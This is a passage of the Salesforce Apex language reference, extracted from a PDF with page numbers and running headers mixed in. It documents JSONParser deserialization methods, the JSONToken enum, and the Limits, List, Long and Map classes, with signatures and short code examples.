readValueAs(System.Type)
Deserializes JSON content into an object of the specified Apex type and returns the deserialized object.
1533
Reference
JSONParser Class
Signature
public Object readValueAs(System.Type apexType)
Parameters
apexType
Type: System.Type
The apexType argument specifies the type of the object that this method returns after deserializing the current value.
Return Value
Type: Object
Usage
If the JSON content to parse contains attributes not present in the Apex type specified in the argument, such as a missing field or object,
this method ignores these attributes and parses the rest of the JSON content. However, for Apex saved using Salesforce API version 24.0
or earlier, this method throws a run-time exception for missing attributes.
Example
The following example parses a sample JSON string and retrieves a Datetime value. Before being able to run this sample, you must create
a new Apex class as follows:
public class Person {
public String name;
public String phone;
}
1534
Reference
JSONParser Class
readValueAsStrict(System.Type)
Deserializes JSON content into an object of the specified Apex type and returns the deserialized object. All attributes in the JSON content
must be present in the specified type.
Signature
public Object readValueAsStrict(System.Type apexType)
Parameters
apexType
Type: System.Type
The apexType argument specifies the type of the object that this method returns after deserializing the current value.
Return Value
Type: Object
Usage
If the JSON content to parse contains attributes not present in the Apex type specified in the argument, such as a missing field or object,
this method throws a run-time exception.
The following example parses a sample JSON string and retrieves a Datetime value. Before being able to run this sample, you must create
a new Apex class as follows:
public class Person {
public String name;
public String phone;
}
1535
Reference
JSONToken Enum
System.assertEquals(
obj.phone, '555-1212');
skipChildren()
Skips all child tokens of type JSONToken.START_ARRAY and JSONToken.START_OBJECT that the parser currently points
to.
Signature
public Void skipChildren()
Return Value
Type: Void
JSONToken Enum
Contains all token values used for parsing JSON content.
Namespace
System
Enum Value
Description
END_ARRAY
END_OBJECT
FIELD_NAME
NOT_AVAILABLE
START_ARRAY
START_OBJECT
VALUE_EMBEDDED_OBJECT
VALUE_FALSE
VALUE_NULL
VALUE_NUMBER_FLOAT
A float value.
VALUE_NUMBER_INT
An integer value.
1536
Reference
Limits Class
Enum Value
Description
VALUE_STRING
A string value.
VALUE_TRUE
Limits Class
Contains methods that return limit information for specific resources.
Namespace
System
Usage
The Limits methods return the specific limit for the particular governor, such as the number of calls of a method or the amount of heap
size remaining.
Because Apex runs in a multitenant environment, the Apex runtime engine strictly enforces a number of limits to ensure that runaway
Apex doesnt monopolize shared resources.
None of the Limits methods require an argument. The format of the limits methods is as follows:
myDMLLimit = Limits.getDMLStatements();
There are two versions of every method: the first returns the amount of the resource that has been used while the second version contains
the word limit and returns the total amount of the resource that is available.
See Understanding Execution Governors and Limits on page 258.
Limits Methods
The following are methods for Limits. All methods are static.
IN THIS SECTION:
getAggregateQueries()
Returns the number of aggregate queries that have been processed with any SOQL query statement.
getLimitAggregateQueries()
Returns the total number of aggregate queries that can be processed with SOQL query statements.
getCallouts()
Returns the number of Web service statements that have been processed.
getLimitCallouts()
Returns the total number of Web service statements that can be processed.
getChildRelationshipsDescribes()
Deprecated. Returns the number of child relationship objects that have been returned.
getLimitChildRelationshipsDescribes()
Deprecated. Returns the maximum number of child relationship objects that can be returned.
1537
Reference
Limits Class
getCpuTime()
Returns the CPU time (in milliseconds) accumulated on the Salesforce servers in the current transaction.
getLimitCpuTime()
Returns the time limit (in milliseconds) of CPU usage in the current transaction.
getDMLRows()
Returns the number of records that have been processed with any statement that counts against DML limits, such as DML statements,
the Database.emptyRecycleBin method, and other methods.
getLimitDMLRows()
Returns the total number of records that can be processed with any statement that counts against DML limits, such as DML statements,
the database.EmptyRecycleBin method, and other methods.
getDMLStatements()
Returns the number of DML statements (such as insert, update or the database.EmptyRecycleBin method) that
have been called.
getLimitDMLStatements()
Returns the total number of DML statements or the database.EmptyRecycleBin methods that can be called.
getEmailInvocations()
Returns the number of email invocations (such as sendEmail) that have been called.
getLimitEmailInvocations()
Returns the total number of email invocation (such as sendEmail) that can be called.
getFieldsDescribes()
Deprecated. Returns the number of field describe calls that have been made.
getLimitFieldsDescribes()
Deprecated. Returns the maximum number of field describe calls that can be made.
getFieldSetsDescribes()
Deprecated. Returns the number of field set describe calls that have been made.
getLimitFieldSetsDescribes()
Deprecated. Returns the maximum number of field set describe calls that can be made.
getFindSimilarCalls()
This method is deprecated. Returns the same value as getSoslQueries. The number of findSimilar methods is no longer
a separate limit, but is tracked as the number of SOSL queries issued.
getLimitFindSimilarCalls()
This method is deprecated. Returns the same value as getLimitSoslQueries. The number of findSimilar methods is
no longer a separate limit, but is tracked as the number of SOSL queries issued.
getFutureCalls()
Returns the number of methods with the future annotation that have been executed (not necessarily completed).
getLimitFutureCalls()
Returns the total number of methods with the future annotation that can be executed (not necessarily completed).
getHeapSize()
Returns the approximate amount of memory (in bytes) that has been used for the heap.
getLimitHeapSize()
Returns the total amount of memory (in bytes) that can be used for the heap.
1538
Reference
Limits Class
getMobilePushApexCalls()
Returns the number of Apex calls that have been used by mobile push notifications during the current metering interval.
getLimitMobilePushApexCalls()
Returns the total number of Apex calls that are allowed per day for mobile push notifications.
getPicklistDescribes()
Deprecated. Returns the number of PicklistEntry objects that have been returned.
getLimitPicklistDescribes()
Deprecated. Returns the maximum number of PicklistEntry objects that can be returned.
getQueries()
Returns the number of SOQL queries that have been issued.
getLimitQueries()
Returns the total number of SOQL queries that can be issued.
getQueryLocatorRows()
Returns the number of records that have been returned by the Database.getQueryLocator method.
getLimitQueryLocatorRows()
Returns the total number of records that have been returned by the Database.getQueryLocator method.
getQueryRows()
Returns the number of records that have been returned by issuing SOQL queries.
getLimitQueryRows()
Returns the total number of records that can be returned by issuing SOQL queries.
getQueueableJobs()
Returns the number of queueable jobs that have been added to the queue per transaction. A queueable job corresponds to a class
that implements the Queueable interface.
getLimitQueueableJobs()
Returns the maximum number of queueable jobs that can be added to the queue per transaction. A queueable job corresponds to
a class that implements the Queueable interface.
getRecordTypesDescribes()
Deprecated. Returns the number of RecordTypeInfo objects that have been returned.
getLimitRecordTypesDescribes()
Deprecated. Returns the maximum number of RecordTypeInfo objects that can be returned.
getRunAs()
This method is deprecated. Returns the same value as getDMLStatements.
getLimitRunAs()
This method is deprecated. Returns the same value as getLimitDMLStatements.
getSavepointRollbacks()
This method is deprecated. Returns the same value as getDMLStatements.
getLimitSavepointRollbacks()
This method is deprecated. Returns the same value as getLimitDMLStatements.
getSavepoints()
This method is deprecated. Returns the same value as getDMLStatements.
1539
Reference
Limits Class
getLimitSavepoints()
This method is deprecated. Returns the same value as getLimitDMLStatements.
getScriptStatements()
Deprecated. Returns a value that is based on CPU time usage and that is an approximation of script statement usage.
getLimitScriptStatements()
Deprecated. Returns the maximum number of Apex statements that can execute.
getSoslQueries()
Returns the number of SOSL queries that have been issued.
getLimitSoslQueries()
Returns the total number of SOSL queries that can be issued.
getAggregateQueries()
Returns the number of aggregate queries that have been processed with any SOQL query statement.
Signature
public static Integer getAggregateQueries()
Return Value
Type: Integer
getLimitAggregateQueries()
Returns the total number of aggregate queries that can be processed with SOQL query statements.
Signature
public static Integer getLimitAggregateQueries()
Return Value
Type: Integer
getCallouts()
Returns the number of Web service statements that have been processed.
Signature
public static Integer getCallouts()
Return Value
Type: Integer
1540
Reference
Limits Class
getLimitCallouts()
Returns the total number of Web service statements that can be processed.
Signature
public static Integer getLimitCallouts()
Return Value
Type: Integer
getChildRelationshipsDescribes()
Deprecated. Returns the number of child relationship objects that have been returned.
Signature
public static Integer getChildRelationshipsDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getLimitChildRelationshipsDescribes()
Deprecated. Returns the maximum number of child relationship objects that can be returned.
Signature
public static Integer getLimitChildRelationshipsDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getCpuTime()
Returns the CPU time (in milliseconds) accumulated on the Salesforce servers in the current transaction.
1541
Reference
Limits Class
Signature
public static Integer getCpuTime()
Return Value
Type: Integer
getLimitCpuTime()
Returns the time limit (in milliseconds) of CPU usage in the current transaction.
Signature
public static Integer getLimitCpuTime()
Return Value
Type: Integer
getDMLRows()
Returns the number of records that have been processed with any statement that counts against DML limits, such as DML statements,
the Database.emptyRecycleBin method, and other methods.
Signature
public static Integer getDMLRows()
Return Value
Type: Integer
getLimitDMLRows()
Returns the total number of records that can be processed with any statement that counts against DML limits, such as DML statements,
the database.EmptyRecycleBin method, and other methods.
Signature
public static Integer getLimitDMLRows()
Return Value
Type: Integer
getDMLStatements()
Returns the number of DML statements (such as insert, update or the database.EmptyRecycleBin method) that have
been called.
1542
Reference
Limits Class
Signature
public static Integer getDMLStatements()
Return Value
Type: Integer
getLimitDMLStatements()
Returns the total number of DML statements or the database.EmptyRecycleBin methods that can be called.
Signature
public static Integer getLimitDMLStatements()
Return Value
Type: Integer
getEmailInvocations()
Returns the number of email invocations (such as sendEmail) that have been called.
Signature
public static Integer getEmailInvocations()
Return Value
Type: Integer
getLimitEmailInvocations()
Returns the total number of email invocation (such as sendEmail) that can be called.
Signature
public static Integer getLimitEmailInvocations()
Return Value
Type: Integer
getFieldsDescribes()
Deprecated. Returns the number of field describe calls that have been made.
Signature
public static Integer getFieldsDescribes()
1543
Reference
Limits Class
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getLimitFieldsDescribes()
Deprecated. Returns the maximum number of field describe calls that can be made.
Signature
public static Integer getLimitFieldsDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getFieldSetsDescribes()
Deprecated. Returns the number of field set describe calls that have been made.
Signature
public static Integer getFieldSetsDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getLimitFieldSetsDescribes()
Deprecated. Returns the maximum number of field set describe calls that can be made.
Signature
public static Integer getLimitFieldSetsDescribes()
1544
Reference
Limits Class
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getFindSimilarCalls()
This method is deprecated. Returns the same value as getSoslQueries. The number of findSimilar methods is no longer a
separate limit, but is tracked as the number of SOSL queries issued.
Signature
public static Integer getFindSimilarCalls()
Return Value
Type: Integer
getLimitFindSimilarCalls()
This method is deprecated. Returns the same value as getLimitSoslQueries. The number of findSimilar methods is no
longer a separate limit, but is tracked as the number of SOSL queries issued.
Signature
public static Integer getLimitFindSimilarCalls()
Return Value
Type: Integer
getFutureCalls()
Returns the number of methods with the future annotation that have been executed (not necessarily completed).
Signature
public static Integer getFutureCalls()
Return Value
Type: Integer
getLimitFutureCalls()
Returns the total number of methods with the future annotation that can be executed (not necessarily completed).
1545
Reference
Limits Class
Signature
public static Integer getLimitFutureCalls()
Return Value
Type: Integer
getHeapSize()
Returns the approximate amount of memory (in bytes) that has been used for the heap.
Signature
public static Integer getHeapSize()
Return Value
Type: Integer
getLimitHeapSize()
Returns the total amount of memory (in bytes) that can be used for the heap.
Signature
public static Integer getLimitHeapSize()
Return Value
Type: Integer
getMobilePushApexCalls()
Returns the number of Apex calls that have been used by mobile push notifications during the current metering interval.
Signature
public static Integer getMobilePushApexCalls()
Return Value
Type:Integer
getLimitMobilePushApexCalls()
Returns the total number of Apex calls that are allowed per day for mobile push notifications.
Signature
public static Integer getLimitMobilePushApexCalls()
1546
Reference
Limits Class
Return Value
Type:Integer
getPicklistDescribes()
Deprecated. Returns the number of PicklistEntry objects that have been returned.
Signature
public static Integer getPicklistDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getLimitPicklistDescribes()
Deprecated. Returns the maximum number of PicklistEntry objects that can be returned.
Signature
public static Integer getLimitPicklistDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getQueries()
Returns the number of SOQL queries that have been issued.
Signature
public static Integer getQueries()
Return Value
Type: Integer
1547
Reference
Limits Class
getLimitQueries()
Returns the total number of SOQL queries that can be issued.
Signature
public static Integer getLimitQueries()
Return Value
Type: Integer
getQueryLocatorRows()
Returns the number of records that have been returned by the Database.getQueryLocator method.
Signature
public static Integer getQueryLocatorRows()
Return Value
Type: Integer
getLimitQueryLocatorRows()
Returns the total number of records that have been returned by the Database.getQueryLocator method.
Signature
public static Integer getLimitQueryLocatorRows()
Return Value
Type: Integer
getQueryRows()
Returns the number of records that have been returned by issuing SOQL queries.
Signature
public static Integer getQueryRows()
Return Value
Type: Integer
getLimitQueryRows()
Returns the total number of records that can be returned by issuing SOQL queries.
1548
Reference
Limits Class
Signature
public static Integer getLimitQueryRows()
Return Value
Type: Integer
getQueueableJobs()
Returns the number of queueable jobs that have been added to the queue per transaction. A queueable job corresponds to a class that
implements the Queueable interface.
Signature
public static Integer getQueueableJobs()
Return Value
Type: Integer
getLimitQueueableJobs()
Returns the maximum number of queueable jobs that can be added to the queue per transaction. A queueable job corresponds to a
class that implements the Queueable interface.
Signature
public static Integer getLimitQueueableJobs()
Return Value
Type: Integer
getRecordTypesDescribes()
Deprecated. Returns the number of RecordTypeInfo objects that have been returned.
Signature
public static Integer getRecordTypesDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
1549
Reference
Limits Class
getLimitRecordTypesDescribes()
Deprecated. Returns the maximum number of RecordTypeInfo objects that can be returned.
Signature
public static Integer getLimitRecordTypesDescribes()
Return Value
Type: Integer
Usage
Note: Because describe limits are no longer enforced in any API version, this method is no longer available. In API version 30.0
and earlier, this method is available but is deprecated.
getRunAs()
This method is deprecated. Returns the same value as getDMLStatements.
Signature
public static Integer getRunAs()
Return Value
Type: Integer
Usage
The number of RunAs methods is no longer a separate limit, but is tracked as the number of DML statements issued.
getLimitRunAs()
This method is deprecated. Returns the same value as getLimitDMLStatements.
Signature
public static Integer getLimitRunAs()
Return Value
Type: Integer
Usage
The number of RunAs methods is no longer a separate limit, but is tracked as the number of DML statements issued.
1550
Reference
Limits Class
getSavepointRollbacks()
This method is deprecated. Returns the same value as getDMLStatements.
Signature
public static Integer getSavepointRollbacks()
Return Value
Type: Integer
Usage
The number of Rollback methods is no longer a separate limit, but is tracked as the number of DML statements issued.
getLimitSavepointRollbacks()
This method is deprecated. Returns the same value as getLimitDMLStatements.
Signature
public static Integer getLimitSavepointRollbacks()
Return Value
Type: Integer
Usage
The number of Rollback methods is no longer a separate limit, but is tracked as the number of DML statements issued.
getSavepoints()
This method is deprecated. Returns the same value as getDMLStatements.
Signature
public static Integer getSavepoints()
Return Value
Type: Integer
Usage
The number of setSavepoint methods is no longer a separate limit, but is tracked as the number of DML statements issued.
getLimitSavepoints()
This method is deprecated. Returns the same value as getLimitDMLStatements.
1551
Reference
Limits Class
Signature
public static Integer getLimitSavepoints()
Return Value
Type: Integer
Usage
The number of setSavepoint methods is no longer a separate limit, but is tracked as the number of DML statements issued.
getScriptStatements()
Deprecated. Returns a value that is based on CPU time usage and that is an approximation of script statement usage.
Signature
public static Integer getScriptStatements()
Return Value
Type: Integer
Usage
Note: Because the script statement limit is no longer enforced in any API version, this method is no longer available. Call
getCpuTime() instead. In API version 30.0 and earlier, this method is still available but is deprecated and returns only an approximation
of statement usage. The formula that is used to compute the return value is based on the ratio of CPU time that is used toward
your transactions CPU timeout limit.
getLimitScriptStatements()
Deprecated. Returns the maximum number of Apex statements that can execute.
Signature
public static Integer getLimitScriptStatements()
Return Value
Type: Integer
Usage
Note: Because the script statement limit is no longer enforced in any API version, this method is no longer available. In API version
30.0 and earlier, this method is still available but is deprecated. Call getLimitCpuTime() instead.
getSoslQueries()
Returns the number of SOSL queries that have been issued.
1552
Reference
List Class
Signature
public static Integer getSoslQueries()
Return Value
Type: Integer
getLimitSoslQueries()
Returns the total number of SOSL queries that can be issued.
Signature
public static Integer getLimitSoslQueries()
Return Value
Type: Integer
List Class
Contains methods for the List collection type.
Namespace
System
Usage
The list methods are all instance methods, that is, they operate on a particular instance of a list. For example, the following removes all
elements from myList:
myList.clear();
Even though the clear method does not include any parameters, the list that calls it is its implicit parameter.
For more information on lists, see Lists on page 29.
IN THIS SECTION:
List Constructors
List Methods
List Constructors
The following are constructors for List.
1553
Reference
List Class
IN THIS SECTION:
List<T>()
Creates a new instance of the List class. A list can hold elements of any data type T.
List<T>(List<T>)
Creates a new instance of the List class by copying the elements from the specified list. T is the data type of the elements in both
lists and can be any data type.
List<T>(Set<T>)
Creates a new instance of the List class by copying the elements from the specified set. T is the data type of the elements in the
set and list and can be any data type.
List<T>()
Creates a new instance of the List class. A list can hold elements of any data type T.
Signature
public List<T>()
Example
// Create a list
List<Integer> ls1 = new List<Integer>();
// Add two integers to the list
ls1.add(1);
ls1.add(2);
List<T>(List<T>)
Creates a new instance of the List class by copying the elements from the specified list. T is the data type of the elements in both
lists and can be any data type.
Signature
public List<T>(List<T> listToCopy)
Parameters
listToCopy
Type: List<T>
The list containing the elements to initialize this list from. T is the data type of the list elements.
Example
List<Integer> ls1 = new List<Integer>();
ls1.add(1);
ls1.add(2);
// Create a list based on an existing one
List<Integer> ls2 = new List<Integer>(ls1);
1554
Reference
List Class
List<T>(Set<T>)
Creates a new instance of the List class by copying the elements from the specified set. T is the data type of the elements in the set
and list and can be any data type.
Signature
public List<T>(Set<T> setToCopy)
Parameters
setToCopy
Type: Set<T>
The set containing the elements to initialize this list with. T is the data type of the set elements.
Example
Set<Integer> s1 = new Set<Integer>();
s1.add(1);
s1.add(2);
// Create a list based on a set
List<Integer> ls = new List<Integer>(s1);
// ls elements are copied from s1
System.debug(ls);// DEBUG|(1, 2)
List Methods
The following are methods for List. All are instance methods.
IN THIS SECTION:
add(Object)
Adds an element to the end of the list.
add(Integer, Object)
Inserts an element into the list at the specified index position.
addAll(List)
Adds all of the elements in the specified list to the list that calls the method. Both lists must be of the same type.
addAll(Set)
Add all of the elements in specified set to the list that calls the method. The set and the list must be of the same type.
clear()
Removes all elements from a list, consequently setting the list's length to zero.
clone()
Makes a duplicate copy of a list.
1555
Reference
List Class
add(Object)
Adds an element to the end of the list.
Signature
public Void add(Object listElement)
Parameters
listElement
Type: Object
Return Value
Type: Void
Example
List<Integer> myList = new List<Integer>();
myList.add(47);
1556
Reference
List Class
add(Integer, Object)
Inserts an element into the list at the specified index position.
Signature
public Void add(Integer index, Object listElement)
Parameters
index
Type: Integer
listElement
Type: Object
Return Value
Type: Void
Example
In the following example, a list with six elements is created, and integers are added to the first and second index positions.
List<Integer> myList = new Integer[6];
myList.add(0, 47);
myList.add(1, 52);
system.assertEquals(myList.get(1), 52);
addAll(List)
Adds all of the elements in the specified list to the list that calls the method. Both lists must be of the same type.
Signature
public Void addAll(List fromList)
Parameters
fromList
Type: List
Return Value
Type: Void
addAll(Set)
Add all of the elements in specified set to the list that calls the method. The set and the list must be of the same type.
1557
Reference
List Class
Signature
public Void addAll(Set fromSet)
Parameters
fromSet
Type: Set
Return Value
Type: Void
clear()
Removes all elements from a list, consequently setting the list's length to zero.
Signature
public Void clear()
Return Value
Type: Void
clone()
Makes a duplicate copy of a list.
Signature
public List<Object> clone()
Return Value
Type: List<Object>
Usage
The cloned list is of the same type as the current list.
Note that if this is a list of sObject records, the duplicate list will only be a shallow copy of the list. That is, the duplicate will have references
to each object, but the sObject records themselves will not be duplicated. For example:
To also copy the sObject records, you must use the deepClone method.
Example
Account a = new
Account(Name='Acme',
BillingCity='New York');
Account b = new Account();
1558
Reference
List Class
Account[] q1 = new
Account[]{a,b};
Account[] q2 = q1.clone();
q1[0].BillingCity = 'San Francisco';
System.assertEquals(
q1[0].BillingCity,
'San Francisco');
System.assertEquals(
q2[0].BillingCity,
'San Francisco');
Signature
public List<Object> deepClone(Boolean opt_preserve_id, Boolean
opt_preserve_readonly_timestamps, Boolean opt_preserve_autonumber)
Parameters
opt_preserve_id
Type: Boolean
The optional opt_preserve_id argument determines whether the IDs of the original objects are preserved or cleared in the
duplicates. If set to true, the IDs are copied to the cloned objects. The default is false, that is, the IDs are cleared.
opt_preserve_readonly_timestamps
Type: Boolean
The optional opt_preserve_readonly_timestamps argument determines whether the read-only timestamp and user
ID fields are preserved or cleared in the duplicates. If set to true, the read-only fields CreatedById, CreatedDate,
LastModifiedById, and LastModifiedDate are copied to the cloned objects. The default is false, that is, the values
are cleared.
opt_preserve_autonumber
Type: Boolean
The optional opt_preserve_autonumber argument determines whether the autonumber fields of the original objects are
preserved or cleared in the duplicates. If set to true, auto number fields are copied to the cloned objects. The default is false,
that is, auto number fields are cleared.
Return Value
Type: List<Object>
Usage
The returned list is of the same type as the current list.
1559
Reference
List Class
Note:
deepClone only works with lists of sObjects, not with lists of primitives.
For Apex saved using SalesforceAPI version 22.0 or earlier, the default value for the opt_preserve_id argument is true,
that is, the IDs are preserved.
To make a shallow copy of a list without duplicating the sObject records it contains, use the clone method.
Example
This example performs a deep clone for a list with two accounts.
Account a = new
Account(Name='Acme',
BillingCity='New York');
Account b = new Account(
Name='Salesforce');
Account[] q1 = new
Account[]{a,b};
Account[] q2 = q1.deepClone();
q1[0].BillingCity = 'San Francisco';
System.assertEquals(
q1[0].BillingCity,
'San Francisco');
System.assertEquals(
q2[0].BillingCity,
'New York');
This example is based on the previous example and shows how to clone a list with preserved read-only timestamp and user ID fields.
insert q1;
List<Account> accts =
[SELECT CreatedById,
CreatedDate, LastModifiedById,
LastModifiedDate, BillingCity
FROM Account
WHERE Name='Acme' OR
Name='Salesforce'];
// Clone list while preserving
// timestamp and user ID fields.
Account[] q3 =
accts.deepClone(false,true,false);
// Verify timestamp fields are
// preserved for the first
// list element.
System.assertEquals(
q3[0].CreatedById,
1560
Reference
List Class
accts[0].CreatedById);
System.assertEquals(
q3[0].CreatedDate,
accts[0].CreatedDate);
System.assertEquals(
q3[0].LastModifiedById,
accts[0].LastModifiedById);
System.assertEquals(
q3[0].LastModifiedDate,
accts[0].LastModifiedDate);
equals(List)
Compares this list with the specified list and returns true if both lists are equal; otherwise, returns false.
Signature
public Boolean equals(List list2)
Parameters
list2
Type: List
The list to compare this list with.
Return Value
Type: Boolean
Usage
Two lists are equal if their elements are equal and are in the same order. The == operator is used to compare the elements of the lists.
The == operator is equivalent to calling the equals method, so you can call list1.equals(list2); instead of list1 ==
list2;.
get(Integer)
Returns the list element stored at the specified index.
Signature
public Object get(Integer index)
Parameters
index
Type: Integer
1561
Reference
List Class
Return Value
Type: Object
Usage
To reference an element of a one-dimensional list of primitives or sObjects, you can also follow the name of the list with the element's
index position in square brackets as shown in the example.
Example
List<Integer> myList = new List<Integer>();
myList.add(47);
Integer myNumber = myList.get(0);
system.assertEquals(myNumber, 47);
List<String> colors = new String[3];
colors[0] = 'Red';
colors[1] = 'Blue';
colors[2] = 'Green';
getSObjectType()
Returns the token of the sObject type that makes up a list of sObjects.
Signature
public Schema.SObjectType getSObjectType()
Return Value
Type: Schema.SObjectType
Usage
Use this method with describe information to determine if a list contains sObjects of a particular type.
Note that this method can only be used with lists that are composed of sObjects.
For more information, see Understanding Apex Describe Information on page 154.
Example
Account a = new Account(name='test');
insert a;
// Create a generic sObject
// variable s
SObject s = Database.query
('SELECT Id FROM Account ' +
'LIMIT 1');
// Verify if that sObject
// variable is
1562
Reference
List Class
// an Account token
System.assertEquals(
s.getSObjectType(),
Account.sObjectType);
// Create a list of
// generic sObjects
List<sObject> q =
new Account[]{};
// Verify if the list of
// sObjects
// contains Account tokens
System.assertEquals(
q.getSObjectType(),
Account.sObjectType);
hashCode()
Returns the hashcode corresponding to this list and its contents.
Signature
public Integer hashCode()
Return Value
Type: Integer
isEmpty()
Returns true if the list has zero elements.
Signature
public Boolean isEmpty()
Return Value
Type: Boolean
iterator()
Returns an instance of an iterator for this list.
Signature
public Iterator iterator()
Return Value
Type: Iterator
1563
Reference
List Class
Usage
From the returned iterator, you can use the iterable methods hasNext and next to iterate through the list.
Note: You do not have to implement the iterable interface to use the iterable methods with a list.
See Custom Iterators.
Example
global class CustomIterable
implements Iterator<Account>{
List<Account> accs {get; set;}
Integer i {get; set;}
public CustomIterable(){
accs =
[SELECT Id, Name,
NumberOfEmployees
FROM Account
WHERE Name = 'false'];
i = 0;
}
global boolean hasNext(){
if(i >= accs.size()) {
return false;
} else {
return true;
}
}
global Account next(){
// 8 is an arbitrary
// constant in this example
// that represents the
// maximum size of the list.
if(i == 8){return null;}
i++;
return accs[i-1];
}
}
remove(Integer)
Removes the list element stored at the specified index, returning the element that was removed.
Signature
public Object remove(Integer index)
1564
Reference
List Class
Parameters
index
Type: Integer
Return Value
Type: Object
Example
List<String> colors = new String[3];
colors[0] = 'Red';
colors[1] = 'Blue';
colors[2] = 'Green';
String S1 = colors.remove(2);
system.assertEquals(S1, 'Green');
set(Integer, Object)
Sets the specified value for the element at the given index.
Signature
public Void set(Integer index, Object listElement)
Parameters
index
Type: Integer
The index of the list element to set.
listElement
Type: Object
The value of the list element to set.
Return Value
Type: Void
Usage
To set an element of a one-dimensional list of primitives or sObjects, you can also follow the name of the list with the element's index
position in square brackets.
Example
List<Integer> myList = new Integer[6];
myList.set(0, 47);
1565
Reference
List Class
myList.set(1, 52);
system.assertEquals(myList.get(1), 52);
List<String> colors = new String[3];
colors[0] = 'Red';
colors[1] = 'Blue';
colors[2] = 'Green';
size()
Returns the number of elements in the list.
Signature
public Integer size()
Return Value
Type: Integer
Example
List<Integer> myList = new List<Integer>();
Integer size = myList.size();
system.assertEquals(size, 0);
List<Integer> myList2 = new Integer[6];
Integer size2 = myList2.size();
system.assertEquals(size2, 6);
sort()
Sorts the items in the list in ascending order.
Signature
public Void sort()
Return Value
Type: Void
Usage
In the following example, the list has three elements. When the list is sorted, the first element is null because it has no value assigned
while the second element has the value of 5:
Note: Using this method, you can sort primitive types, SelectOption elements, and sObjects (standard objects and custom objects).
For more information on the sort order used for sObjects, see Sorting Lists of sObjects. You can also sort custom types (your Apex
classes) if they implement the Comparable Interface interface.
1566
Reference
Long Class
Example
List<Integer> q1 = new Integer[3];
// Assign values to the first
// two elements
q1[0] = 10;
q1[1] = 5;
q1.sort();
// First element is null, second is 5
system.assertEquals(q1.get(1), 5);
Long Class
Contains methods for the Long primitive data type.
Namespace
System
Usage
For more information on Long, see Primitive Data Types on page 26.
Long Methods
The following are methods for Long.
IN THIS SECTION:
format()
Returns the String format for this Long using the locale of the context user.
intValue()
Returns the Integer value for this Long.
valueOf(String)
Returns a Long that contains the value of the specified String. As in Java, the string is interpreted as representing a signed decimal
Long.
format()
Returns the String format for this Long using the locale of the context user.
Signature
public String format()
1567
Reference
Long Class
Return Value
Type: String
Example
Long myLong = 4271990;
system.assertEquals('4,271,990', myLong.format());
intValue()
Returns the Integer value for this Long.
Signature
public Integer intValue()
Return Value
Type: Integer
Example
Long myLong = 7191991;
Integer value = myLong.intValue();
system.assertEquals(7191991, myLong.intValue());
valueOf(String)
Returns a Long that contains the value of the specified String. As in Java, the string is interpreted as representing a signed decimal Long.
Signature
public static Long valueOf(String toLong)
Parameters
toLong
Type: String
Return Value
Type: Long
Example
Long L1 = long.valueOf('123456789');
1568
Reference
Map Class
Map Class
Contains methods for the Map collection type.
Namespace
System
Usage
The Map methods are all instance methods, that is, they operate on a particular instance of a map. The following are the instance methods
for maps.
Note:
Map keys and values can be of any data typeprimitive types, collections, sObjects, user-defined types, and built-in Apex
types.
Uniqueness of map keys of user-defined types is determined by the equals and hashCode methods, which you provide
in your classes. Uniqueness of keys of all other non-primitive types, such as sObject keys, is determined by comparing the
objects field values.
Map keys of type String are case-sensitive. Two keys that differ only by the case are considered unique and have corresponding
distinct Map entries. Subsequently, the Map methods, including put, get, containsKey, and remove treat these keys
as distinct.
For more information on maps, see Maps on page 32.
IN THIS SECTION:
Map Constructors
Map Methods
Map Constructors
The following are constructors for Map.
IN THIS SECTION:
Map<T1, T2>()
Creates a new instance of the Map class. T1 is the data type of the keys and T2 is the data type of the values.
Map<T1, T2>(Map<T1, T2>)
Creates a new instance of the Map class and initializes it by copying the entries from the specified map. T1 is the data type of the
keys and T2 is the data type of the values.
Map<ID, sObject>(List<sObject>)
Creates a new instance of the Map class and populates it with the passed-in list of sObject records. The keys are populated with
the sObject IDs and the values are the sObjects.
Map<T1, T2>()
Creates a new instance of the Map class. T1 is the data type of the keys and T2 is the data type of the values.
1569
Reference
Map Class
Signature
public Map<T1,T2>()
Example
Map<Integer, String> m1 = new Map<Integer, String>();
m1.put(1, 'First item');
m1.put(2, 'Second item');
Signature
public Map<T1,T2>(Map<T1,T2> mapToCopy)
Parameters
mapToCopy
Example
Map<Integer, String> m1 = new Map<Integer, String>();
m1.put(1, 'First item');
m1.put(2, 'Second item');
Map<Integer, String> m2 = new Map<Integer, String>(m1);
// The map elements of m2 are copied from m1
System.debug(m2);
Map<ID, sObject>(List<sObject>)
Creates a new instance of the Map class and populates it with the passed-in list of sObject records. The keys are populated with the
sObject IDs and the values are the sObjects.
Signature
public Map<ID,sObject>(List<sObject> recordList)
Parameters
recordList
Type: List<sObject>
The list of sObjects to populate the map with.
1570
Reference
Map Class
Example
List<Account> ls = [select Id,Name from Account];
Map<Id, Account> m = new Map<Id, Account>(ls);
Map Methods
The following are methods for Map. All are instance methods.
IN THIS SECTION:
clear()
Removes all of the key-value mappings from the map.
clone()
Makes a duplicate copy of the map.
containsKey(Object)
Returns true if the map contains a mapping for the specified key.
deepClone()
Makes a duplicate copy of a map, including sObject records if this is a map with sObject record values.
equals(Map)
Compares this map with the specified map and returns true if both maps are equal; otherwise, returns false.
get(Object)
Returns the value to which the specified key is mapped, or null if the map contains no value for this key.
getSObjectType()
Returns the token of the sObject type that makes up the map values.
hashCode()
